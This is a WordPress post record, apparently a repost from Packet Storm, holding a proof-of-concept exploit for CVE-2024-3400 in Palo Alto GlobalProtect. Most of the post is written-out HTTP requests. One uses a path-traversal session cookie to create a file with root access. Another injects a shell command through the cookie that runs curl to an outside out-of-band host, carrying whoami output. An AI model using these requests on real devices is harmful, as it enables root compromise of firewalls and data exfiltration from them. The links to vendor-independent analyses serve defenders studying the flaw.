{"id":56300,"date":"2024-04-17T20:31:29","date_gmt":"2024-04-17T16:31:29","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178099\/paloalto-exec.txt"},"modified":"2024-04-17T20:31:29","modified_gmt":"2024-04-17T16:31:29","slug":"palo-alto-os-command-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/palo-alto-os-command-injection\/","title":{"rendered":"Palo Alto OS Command Injection"},"content":{"rendered":"<p># CVE-2024-3400<\/p>\n<p>CVE-2024-3400 Palo Alto OS Command Injection<\/p>\n<p>Send this HTTP request:<\/p>\n<p>```http<\/p>\n<p>POST \/ssl-vpn\/hipreport.esp HTTP\/1.1<br \/>Host: 127.0.0.1<br \/>Cookie: SESSID=\/..\/..\/..\/var\/appweb\/sslvpndocs\/global-protect\/portal\/images\/hellome1337.txt;<br \/>Connection: close<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 0<br \/>```<\/p>\n<p>![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/96803de5-1d8c-42ec-b1fc-60e8e4a0a954)<\/p>\n<p>You will create the file hellome1337.txt on the server with root access.<\/p>\n<p>Now, if you try to access the file, you should receive a 403 instead of a 404.<\/p>\n<p>![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d)<\/p>\n<p>### Command Injection<\/p>\n<p>```<br \/>POST \/ssl-vpn\/hipreport.esp HTTP\/1.1<br \/>Host: 127.0.01<br \/>Cookie: SESSID=.\/..\/..\/..\/opt\/panlogs\/tmp\/device_telemetry\/minute\/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;<br \/>Connection: close<br \/>Content-Type: application\/x-www-form-urlencoded<br \/>Content-Length: 0<\/p>\n<p>```<\/p>\n<p>More info:<br \/>https:\/\/attackerkb.com\/topics\/SSTk336Tmf\/cve-2024-3400\/rapid7-analysis<br \/>https:\/\/labs.watchtowr.com\/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400\/<\/p>\n","protected":false},"excerpt":{"rendered":"<p># CVE-2024-3400 CVE-2024-3400 Palo Alto OS Command Injection Send this HTTP 
request: ```http POST \/ssl-vpn\/hipreport.esp HTTP\/1.1 Host: 127.0.0.1 Cookie: SESSID=\/..\/..\/..\/var\/appweb\/sslvpndocs\/global-protect\/portal\/images\/hellome1337.txt; Connection: close Content-Type: application\/x-www-form-urlencoded Content-Length: 0 ``` ![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/96803de5-1d8c-42ec-b1fc-60e8e4a0a954) You will create the file hellome1337.txt on the server with root access. Now, if you try to access the file, you should receive a 403 instead of a 404. ![image](https:\/\/github.com\/h4x0r-dz\/CVE-2024-3400\/assets\/26070859\/e579d4a6-11a5-4f7c-a3da-ba7b0cfa8a4d) ### Command Injection ```POST \/ssl-vpn\/hipreport.esp HTTP\/1.1 Host: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56300","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56300","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56300"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56300\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56300"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56300"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?po
st=56300"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}